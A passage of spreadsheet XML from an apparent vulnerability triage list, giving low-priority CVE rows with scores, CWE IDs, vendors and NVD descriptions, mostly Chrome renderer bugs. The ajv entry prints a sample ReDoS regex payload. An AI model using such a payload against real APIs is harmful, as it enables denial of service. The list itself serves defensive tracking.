          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70600</t>
        </is>
      </c>
    </row>
    <row r="5864">
      <c r="A5864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84066</t>
        </is>
      </c>
      <c r="C5864" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5864" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5864" s="5" t="inlineStr"/>
      <c r="F5864" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5864" s="5" t="inlineStr"/>
      <c r="H5864" s="5" t="inlineStr"/>
      <c r="I5864" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5864" s="5" t="inlineStr"/>
      <c r="K5864" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5864" s="5" t="inlineStr">
        <is>
          <t>The Directorist: AI-Powered Business Directory, Listings &amp; Classified Ads WordPress plugin before 8.9 does not verify that the requesting user owns the post being modified before writing uploaded file references to its metadata, allowing users with the subscriber role and above to overwrite image metadata on posts belonging to other users.</t>
        </is>
      </c>
      <c r="M5864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84066</t>
        </is>
      </c>
    </row>
    <row r="5865">
      <c r="A5865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84389</t>
        </is>
      </c>
      <c r="C5865" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5865" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5865" s="5" t="inlineStr"/>
      <c r="F5865" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5865" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H5865" s="5" t="inlineStr"/>
      <c r="I5865" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5865" s="5" t="inlineStr"/>
      <c r="K5865" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5865" s="5" t="inlineStr">
        <is>
          <t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M5865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t>
        </is>
      </c>
    </row>
    <row r="5866">
      <c r="A5866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85052</t>
        </is>
      </c>
      <c r="C5866" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5866" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5866" s="5" t="inlineStr"/>
      <c r="F5866" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5866" s="5" t="inlineStr"/>
      <c r="H5866" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5866" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5866" s="5" t="inlineStr"/>
      <c r="K5866" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5866" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in CrashReporting in Google Chrome prior to 152.0.7977.82 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M5866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85052</t>
        </is>
      </c>
    </row>
    <row r="5867">
      <c r="A5867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86487</t>
        </is>
      </c>
      <c r="C5867" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5867" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5867" s="5" t="inlineStr"/>
      <c r="F5867" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5867" s="5" t="inlineStr"/>
      <c r="H5867" s="5" t="inlineStr"/>
      <c r="I5867" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5867" s="5" t="inlineStr"/>
      <c r="K5867" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5867" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 a crafted WebSocket message allowed read-only whiteboard users to modify canvas content</t>
        </is>
      </c>
      <c r="M5867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86487</t>
        </is>
      </c>
    </row>
    <row r="5868">
      <c r="A5868" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87434</t>
        </is>
      </c>
      <c r="C5868" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5868" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5868" s="5" t="inlineStr"/>
      <c r="F5868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5868" s="5" t="inlineStr"/>
      <c r="H5868" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5868" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5868" s="5" t="inlineStr"/>
      <c r="K5868" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5868" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in CORS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87434</t>
        </is>
      </c>
    </row>
    <row r="5869">
      <c r="A5869" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87442</t>
        </is>
      </c>
      <c r="C5869" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5869" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5869" s="5" t="inlineStr"/>
      <c r="F5869" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5869" s="5" t="inlineStr"/>
      <c r="H5869" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5869" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5869" s="5" t="inlineStr"/>
      <c r="K5869" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L5869" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in Prerender in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87442</t>
        </is>
      </c>
    </row>
    <row r="5870">
      <c r="A5870" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87451</t>
        </is>
      </c>
      <c r="C5870" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5870" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5870" s="5" t="inlineStr"/>
      <c r="F5870" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5870" s="5" t="inlineStr"/>
      <c r="H5870" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5870" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5870" s="5" t="inlineStr"/>
      <c r="K5870" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5870" s="5" t="inlineStr">
        <is>
          <t>Information leak in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87451</t>
        </is>
      </c>
    </row>
    <row r="5871">
      <c r="A5871" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87452</t>
        </is>
      </c>
      <c r="C5871" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5871" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5871" s="5" t="inlineStr"/>
      <c r="F5871" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5871" s="5" t="inlineStr"/>
      <c r="H5871" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I5871" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5871" s="5" t="inlineStr"/>
      <c r="K5871" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5871" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in GPU in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87452</t>
        </is>
      </c>
    </row>
    <row r="5872">
      <c r="A5872" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87485</t>
        </is>
      </c>
      <c r="C5872" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5872" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5872" s="5" t="inlineStr"/>
      <c r="F5872" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5872" s="5" t="inlineStr"/>
      <c r="H5872" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5872" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5872" s="5" t="inlineStr"/>
      <c r="K5872" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5872" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in CORS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87485</t>
        </is>
      </c>
    </row>
    <row r="5873">
      <c r="A5873" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87498</t>
        </is>
      </c>
      <c r="C5873" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5873" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5873" s="5" t="inlineStr"/>
      <c r="F5873" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5873" s="5" t="inlineStr"/>
      <c r="H5873" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5873" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5873" s="5" t="inlineStr"/>
      <c r="K5873" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5873" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in WebUI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M5873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87498</t>
        </is>
      </c>
    </row>
    <row r="5874">
      <c r="A5874" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87517</t>
        </is>
      </c>
      <c r="C5874" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5874" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5874" s="5" t="inlineStr"/>
      <c r="F5874" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5874" s="5" t="inlineStr"/>
      <c r="H5874" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="I5874" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5874" s="5" t="inlineStr"/>
      <c r="K5874" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L5874" s="5" t="inlineStr">
        <is>
          <t>Race condition in Mobile in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M5874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87517</t>
        </is>
      </c>
    </row>
    <row r="5875">
      <c r="A5875" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87521</t>
        </is>
      </c>
      <c r="C5875" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5875" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5875" s="5" t="inlineStr"/>
      <c r="F5875" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5875" s="5" t="inlineStr"/>
      <c r="H5875" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5875" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5875" s="5" t="inlineStr"/>
      <c r="K5875" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5875" s="5" t="inlineStr">
        <is>
          <t>Information leak in WebMCP in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87521</t>
        </is>
      </c>
    </row>
    <row r="5876">
      <c r="A5876" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87531</t>
        </is>
      </c>
      <c r="C5876" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5876" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5876" s="5" t="inlineStr"/>
      <c r="F5876" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5876" s="5" t="inlineStr"/>
      <c r="H5876" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5876" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5876" s="5" t="inlineStr"/>
      <c r="K5876" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5876" s="5" t="inlineStr">
        <is>
          <t>Information leak in CORS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87531</t>
        </is>
      </c>
    </row>
    <row r="5877">
      <c r="A5877" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87539</t>
        </is>
      </c>
      <c r="C5877" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5877" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5877" s="5" t="inlineStr"/>
      <c r="F5877" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5877" s="5" t="inlineStr"/>
      <c r="H5877" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5877" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5877" s="5" t="inlineStr"/>
      <c r="K5877" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L5877" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87539</t>
        </is>
      </c>
    </row>
    <row r="5878">
      <c r="A5878" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87611</t>
        </is>
      </c>
      <c r="C5878" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5878" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5878" s="5" t="inlineStr"/>
      <c r="F5878" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5878" s="5" t="inlineStr"/>
      <c r="H5878" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5878" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5878" s="5" t="inlineStr"/>
      <c r="K5878" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5878" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87611</t>
        </is>
      </c>
    </row>
    <row r="5879">
      <c r="A5879" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87614</t>
        </is>
      </c>
      <c r="C5879" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5879" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5879" s="5" t="inlineStr"/>
      <c r="F5879" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5879" s="5" t="inlineStr"/>
      <c r="H5879" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5879" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5879" s="5" t="inlineStr"/>
      <c r="K5879" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5879" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87614</t>
        </is>
      </c>
    </row>
    <row r="5880">
      <c r="A5880" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87652</t>
        </is>
      </c>
      <c r="C5880" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5880" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5880" s="5" t="inlineStr"/>
      <c r="F5880" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5880" s="5" t="inlineStr"/>
      <c r="H5880" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5880" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5880" s="5" t="inlineStr"/>
      <c r="K5880" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5880" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in PushAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87652</t>
        </is>
      </c>
    </row>
    <row r="5881">
      <c r="A5881" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87657</t>
        </is>
      </c>
      <c r="C5881" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D5881" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5881" s="5" t="inlineStr"/>
      <c r="F5881" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5881" s="5" t="inlineStr"/>
      <c r="H5881" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5881" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5881" s="5" t="inlineStr"/>
      <c r="K5881" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L5881" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87657</t>
        </is>
      </c>
    </row>
    <row r="5882">
      <c r="A5882" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49262</t>
        </is>
      </c>
      <c r="C5882" s="5" t="n">
        <v>3</v>
      </c>
      <c r="D5882" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5882" s="5" t="inlineStr"/>
      <c r="F5882" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5882" s="5" t="inlineStr"/>
      <c r="H5882" s="5" t="inlineStr"/>
      <c r="I5882" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5882" s="5" t="inlineStr"/>
      <c r="K5882" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L5882" s="5" t="inlineStr">
        <is>
          <t>In the Aimeos Pagible content management system prior to version 0.10.4, the administrative proxy route (`cmsproxy`) is vulnerable to a Server-Side Request Forgery (SSRF) attack via DNS Rebinding. A Time-of-Check to Time-of-Use (TOCTOU) race condition exists between the URL validation phase and the actual HTTP request phase, allowing attackers to access internal network resources and cloud metadata endpoints. Version 0.10.4 fixes the issue.</t>
        </is>
      </c>
      <c r="M5882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49262</t>
        </is>
      </c>
    </row>
    <row r="5883">
      <c r="A5883" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87876</t>
        </is>
      </c>
      <c r="C5883" s="5" t="n">
        <v>3</v>
      </c>
      <c r="D5883" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5883" s="5" t="inlineStr"/>
      <c r="F5883" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5883" s="5" t="inlineStr"/>
      <c r="H5883" s="5" t="inlineStr"/>
      <c r="I5883" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5883" s="5" t="inlineStr"/>
      <c r="K5883" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L5883" s="5" t="inlineStr">
        <is>
          <t>Two case-insensitive comparisons on request-derived usernames outside the main authorization path in CUPS's scheduler (printer ACL validation and private-attribute filtering) could allow bypass of username-based access controls in certain configurations.</t>
        </is>
      </c>
      <c r="M5883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87876</t>
        </is>
      </c>
    </row>
    <row r="5884">
      <c r="A5884" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5884" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-69873</t>
        </is>
      </c>
      <c r="C5884" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5884" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5884" s="5" t="inlineStr"/>
      <c r="F5884" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5884" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5884" s="5" t="inlineStr"/>
      <c r="I5884" s="5" t="inlineStr">
        <is>
          <t>2026-02-11</t>
        </is>
      </c>
      <c r="J5884" s="5" t="inlineStr"/>
      <c r="K5884" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L5884" s="5" t="inlineStr">
        <is>
          <t>ajv (Another JSON Schema Validator) before 8.18.0 is vulnerable to Regular Expression Denial of Service (ReDoS) when the $data option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax ($data reference), which is passed directly to the JavaScript RegExp() constructor without validation. An attacker can inject a malicious regex pattern (e.g., "^(a|a)*$") combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with $data: true for dynamic schema validation. This issue is also fixed in version 6.14.0.</t>
        </is>
      </c>
      <c r="M5884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-69873</t>
        </is>
      </c>
    </row>
    <row r="5885">
      <c r="A5885" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16517</t>
        </is>
      </c>
      <c r="C5885" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D5885" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5885" s="5" t="inlineStr"/>
      <c r="F5885" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5885" s="5" t="inlineStr"/>
      <c r="H5885" s="5" t="inlineStr"/>
      <c r="I5885" s="5" t="inlineStr">
        <is>
          <t>2026-07-21</t>
        </is>
      </c>
      <c r="J5885" s="5" t="inlineStr"/>
      <c r="K5885" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L5885" s="5" t="inlineStr">
        <is>
          <t>A signed integer overflow vulnerability was found in libarchive's ZIP writer. In the archive_write_zip_header function in archive_write_set_format_zip.c, when ZIP encryption is enabled and the entry file size is close to INT64_MAX, the addition of the encryption overhead to the entry size overflows int64_t, resulting in undefined behavior. This could lead to incorrect Zip64 extension decisions or potential memory corruption.</t>
        </is>
      </c>
      <c r="M5885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16517</t>
        </is>
      </c>
    </row>
    <row r="5886">
      <c r="A5886" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42578</t>
        </is>
      </c>
